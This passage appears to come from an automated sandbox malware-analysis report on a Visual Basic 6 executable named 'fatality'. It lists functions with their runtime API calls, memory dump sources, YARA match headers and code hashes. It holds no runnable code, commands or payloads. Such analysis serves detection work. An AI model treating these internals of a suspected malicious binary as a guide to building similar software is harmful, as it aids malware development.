                                                                                                                                                            • String ID: VUUU$VUUU$gfff
                                                                                                                                                            • API String ID: 3310697333-2314002932
                                                                                                                                                            • Opcode ID: 54317dd8e67cb568bc16672bdc0ba9886cd6a0f52f287c8f5b22d9497fb7e9dd
                                                                                                                                                            • Instruction ID: f629f5cd6c6994accf7ffd4865734aab981d1da92c9f489476db43807f34fb7a
                                                                                                                                                            • Opcode Fuzzy Hash: 54317dd8e67cb568bc16672bdc0ba9886cd6a0f52f287c8f5b22d9497fb7e9dd
                                                                                                                                                            • Instruction Fuzzy Hash: FB717771E00105EBC718CFB9DA8959DBF76ABCC341F44413AE805FB6A4DA385D8A8B58
                                                                                                                                                            Function 004163E0 Relevance: 46.8, APIs: 31, Instructions: 331COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,00000000,6CEE285F,6CED1654), ref: 00416456
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,00000000), ref: 00416487
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000040,?,00000000), ref: 0041649F
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 004164C4
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000014,?,00000000,?,?,?,00000000,?,?,00000040,?,00000000), ref: 004164D9
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,000000E0,?,00000000,?,?,00000014,?,00000000,?,?,?,00000000,?,?), ref: 004164F4
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000000,00000028,?,00000000,00000001,00000000,00000000,?,?,000000E0,?,00000000,?,?,00000014,?), ref: 00416513
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 00416527
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416547
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416567
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000,?,?,00000040,?,00000000), ref: 00416595
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?,?,?,00000040,?,00000000), ref: 0041659E
                                                                                                                                                            • __vbaUbound.MSVBVM60(00000001,?,?,?,00000040,?,00000000), ref: 004165B8
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,00000040,?,00000000), ref: 004165C0
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004165F6
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416606
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416622
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416632
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416665
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416675
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166BD
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166CD
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166F3
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416703
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416729
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416739
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416755
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416762
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,00000040,?,00000000), ref: 0041678D
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,004167B5), ref: 004167AE
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?,00000000,?,?,00000040,?,00000000), ref: 004167CB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$BoundsGenerate$System$DestructExitLockOverflowProcRedimUboundUnlock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2234381736-0
                                                                                                                                                            • Opcode ID: a464f5ca76685ac84e1fccbaa1c1c20bc3de5b4abe262b6c2715ba6d0aacd5c5
                                                                                                                                                            • Instruction ID: f2618860313800eaedd81b2e61ad480ccb106d02fda6e258e19164c82fe6daf4
                                                                                                                                                            • Opcode Fuzzy Hash: a464f5ca76685ac84e1fccbaa1c1c20bc3de5b4abe262b6c2715ba6d0aacd5c5
                                                                                                                                                            • Instruction Fuzzy Hash: 01C15D719002199BCF14DFA8CA80AEEB7B5FF48304F61459AD419B7280D775ED82CFA5
                                                                                                                                                            Function 0040E840 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 146COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040E85E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040E8A3
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,?,004025E6), ref: 0040E8B8
                                                                                                                                                            • #712.MSVBVM60(?,file:///,00406674,00000001,000000FF,00000000,?,?,?,?,004025E6), ref: 0040E8D9
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E8E4
                                                                                                                                                            • #712.MSVBVM60(?,00407218,004055FC,00000001,000000FF,00000000,?,?,?,?,004025E6), ref: 0040E905
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E910
                                                                                                                                                            • #572.MSVBVM60(00004002), ref: 0040E969
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E974
                                                                                                                                                            • #537.MSVBVM60(00000020), ref: 0040E97F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E98A
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000001,000000FF,00000001), ref: 0040E9B6
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00407220,00000000), ref: 0040E9C8
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040E9CF
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E9DA
                                                                                                                                                            • #712.MSVBVM60(?,00000000), ref: 0040E9E5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E9F0
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0040EA0C
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040EA2E
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040EA78), ref: 0040EA71
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0040EAA2
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$#712$CopyErrorFree$#537#572ChkstkListOverflow
                                                                                                                                                            • String ID: $file:///
                                                                                                                                                            • API String ID: 1913684286-1087255347
                                                                                                                                                            • Opcode ID: 471baceb6f3394a0abeda471f643fca34b39d10fb75ad6f9a39b5992f0af1d91
                                                                                                                                                            • Instruction ID: 6c3c390ee14800d438280c46509e4d6c9a5a921f8fc3fa6165506003015d033a
                                                                                                                                                            • Opcode Fuzzy Hash: 471baceb6f3394a0abeda471f643fca34b39d10fb75ad6f9a39b5992f0af1d91
                                                                                                                                                            • Instruction Fuzzy Hash: 6551FA71900208EBDB04DFE4DE48BDEBBB4FF08714F208229E612BB2A4DB755A45CB54
                                                                                                                                                            Function 0040C843 Relevance: 39.4, APIs: 26, Instructions: 364COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C884
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,0000004C), ref: 0040C8B7
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C8EF
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000728), ref: 0040C94E
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?), ref: 0040C984
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040563C,00000020), ref: 0040C9C8
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,?), ref: 0040C9FB
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0040CC42
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 0040CC8C
                                                                                                                                                            • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 0040CCA4
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CCC7
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,00000040), ref: 0040CCEB
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,?), ref: 0040CD02
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004055C8,0000000C), ref: 0040CD18
                                                                                                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040CD28
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 0040CD31
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckHresult$ErrorFree$ChkstkExitListNew2OverflowProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 435708370-0
                                                                                                                                                            • Opcode ID: 0fb701564dfaea06c5895f1466d9b178208b09d8fd869f579df3c1af8609f287
                                                                                                                                                            • Instruction ID: a4ec598c1f86ad3a10f33067e1d5db8d23c0cfab8629dd77bc108e4b9737f716
                                                                                                                                                            • Opcode Fuzzy Hash: 0fb701564dfaea06c5895f1466d9b178208b09d8fd869f579df3c1af8609f287
                                                                                                                                                            • Instruction Fuzzy Hash: EDE11775900208EFDB14DFA4C988ADEBBB5FF48700F208269F509B7291D7759985CF64
                                                                                                                                                            Function 00418C90 Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 103COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418E00
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Error$AnsiCopySystemUnicode$BstrChkstkList
                                                                                                                                                            • String ID: `%@
                                                                                                                                                            • API String ID: 653519621-700023621
                                                                                                                                                            • Opcode ID: 47785f7da99cc1d885bec86910e85175bc0604dc897027ecb10ac562a20b6aef
                                                                                                                                                            • Instruction ID: 012eab173ab8f044d01c72bc6db05120050b8ff049b8a372a5089938a40e6a64
                                                                                                                                                            • Opcode Fuzzy Hash: 47785f7da99cc1d885bec86910e85175bc0604dc897027ecb10ac562a20b6aef
                                                                                                                                                            • Instruction Fuzzy Hash: 5E41DA76900209EBCB04EFE4DE59EDEBB78FB48305F108519F216B71A0DB75AA44CB64
                                                                                                                                                            Function 004123C0 Relevance: 34.6, APIs: 23, Instructions: 111COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,?,?,00000000,004025E6), ref: 004123DE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 0041240B
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 0041241A
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00412439
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00412448
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041245C
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041246A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041247A
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00412481
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041248E
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 004124C1
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 004124C8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004124D3
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004124E3
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004124EE
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004124FE
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0041250B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00412526
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00412536
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 0041253D
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0041257A), ref: 0041256A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00412573
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00412590
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$BstrFile$#516#631Error$#525#570#648ChkstkCloseCopyGet3OpenOverflowSeek
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2204187013-0
                                                                                                                                                            • Opcode ID: aee74aa748bdbe5f43d680c2071f8268772085965dd0da7e2e4a6c12403588e9
                                                                                                                                                            • Instruction ID: 9955b3bf1519d9cbb4ebd4c64d53d5ed1380afe2e3f12c5c860cc2a089516978
                                                                                                                                                            • Opcode Fuzzy Hash: aee74aa748bdbe5f43d680c2071f8268772085965dd0da7e2e4a6c12403588e9
                                                                                                                                                            • Instruction Fuzzy Hash: F341E971D00248EBDB04DFA4DB5DBDEBBB5AB48305F208129E512B76A0DB785A44CB58
                                                                                                                                                            Function 004161B0 Relevance: 31.7, APIs: 21, Instructions: 182COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004075E8,00000011,00000000,6CEE285F,6CED1654), ref: 00416207
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,00000040,?,00000000), ref: 00416231
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000002), ref: 00416242
                                                                                                                                                            • #537.MSVBVM60(00000000), ref: 00416252
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041625F
                                                                                                                                                            • #537.MSVBVM60(?,00000000), ref: 0041626B
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00416272
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 00416275
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00416280
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004075CC,00000000), ref: 00416288
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004162A5
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 004162D9
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 004162EF
                                                                                                                                                            • #537.MSVBVM60(?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416300
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416307
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004075E0,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041630F
                                                                                                                                                            • #537.MSVBVM60(00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416326
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041632D
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004075D8,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416335
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041636D
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,004163C6), ref: 004163BF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$#537ErrorSystem$FreeList$Construct2Destruct
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2170920009-0
                                                                                                                                                            • Opcode ID: 6ebc35bea6a8f601c4351b039a5634e8cf150fa43bae1ceb42ad26cebf419b59
                                                                                                                                                            • Instruction ID: 748b6d861cac5db048dabb3adba27979951a1416e05c768a4f54423434dde149
                                                                                                                                                            • Opcode Fuzzy Hash: 6ebc35bea6a8f601c4351b039a5634e8cf150fa43bae1ceb42ad26cebf419b59
                                                                                                                                                            • Instruction Fuzzy Hash: 99518371A00219ABDB14DBB4CD45FEEBBB9EF48700F11812AE946F7291DA745D04CB94
                                                                                                                                                            Function 0040E340 Relevance: 31.7, APIs: 21, Instructions: 166COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 0040E391
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,004071DC), ref: 0040E39F
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E3AA
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4), ref: 0040E3D0
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040E3DD
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,004071DC), ref: 0040E3F0
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E3FB
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4), ref: 0040E41B
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040E420
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007BC), ref: 0040E445
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004071EC,00000078), ref: 0040E465
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040E46D
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007B0), ref: 0040E494
                                                                                                                                                            • #519.MSVBVM60(?), ref: 0040E49A
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E4A5
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040E4B9
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040E4C5
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?), ref: 0040E4CF
                                                                                                                                                            • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 0040E4FC
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 0040E50E
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040E546), ref: 0040E53F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckFreeHresult$Cast$#519BstrCopyErrorEventExitListMoveProcRaise
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2502233557-0
                                                                                                                                                            • Opcode ID: 7be39dfed923fa2b8522099cfc5c1e781b78136ccb618d12821b1d76752c5173
                                                                                                                                                            • Instruction ID: 2210176cfa9892e4a02b66722b5e7dfe915d6efbf244aeeba38d0bb5bf168e27
                                                                                                                                                            • Opcode Fuzzy Hash: 7be39dfed923fa2b8522099cfc5c1e781b78136ccb618d12821b1d76752c5173
                                                                                                                                                            • Instruction Fuzzy Hash: 3D514BB1901208ABDB00DFA5DD48EEEBBB8FF48704F10856AF505B72A0D774A945CF68
                                                                                                                                                            Function 00410B60 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 84COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • #712.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BAC
